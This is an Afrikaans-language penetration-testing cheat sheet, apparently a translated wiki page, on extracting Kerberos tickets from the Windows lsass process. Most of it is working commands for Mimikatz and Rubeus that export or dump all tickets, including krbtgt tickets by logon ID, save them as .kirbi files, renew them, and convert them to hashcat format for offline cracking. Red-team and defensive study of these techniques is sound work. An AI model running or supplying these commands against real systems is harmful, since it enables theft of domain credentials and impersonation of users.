Harvesting tickets from Windows

Tickets in Windows word bestuur en gestoor deur die lsass (Local Security Authority Subsystem Service) proses, wat verantwoordelik is vir die hantering van sekuriteitsbeleide. Om hierdie tickets te onttrek, is dit nodig om met die lsass-proses te kommunikeer. 'n Nie-administratiewe gebruiker kan slegs toegang tot hul eie tickets verkry, terwyl 'n administrateur die voorreg het om alle tickets op die stelsel te onttrek. Vir sulke operasies word die gereedskap Mimikatz en Rubeus wyd gebruik, elk met verskillende opdragte en funksies.

Mimikatz

Mimikatz is 'n veelsydige hulpmiddel wat met Windows-sekuriteit kan kommunikeer. Dit word nie net gebruik om tickets te onttrek nie, maar ook vir verskeie ander sekuriteitsverwante operasies.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus is 'n hulpmiddel spesifiek ontwerp vir Kerberos-interaksie en manipulasie. Dit word gebruik vir kaartjie-uitkapping en hantering, sowel as ander Kerberos-verwante aktiwiteite.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Wanneer jy hierdie opdragte gebruik, maak seker om plekhouers soos <BASE64_TICKET> en <luid> te vervang met die werklike Base64-gecodeerde kaartjie en Aanmeld-ID onderskeidelik. Hierdie gereedskap bied uitgebreide funksionaliteit vir die bestuur van kaartjies en interaksie met die sekuriteitsmeganismes van Windows.

Verwysings

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/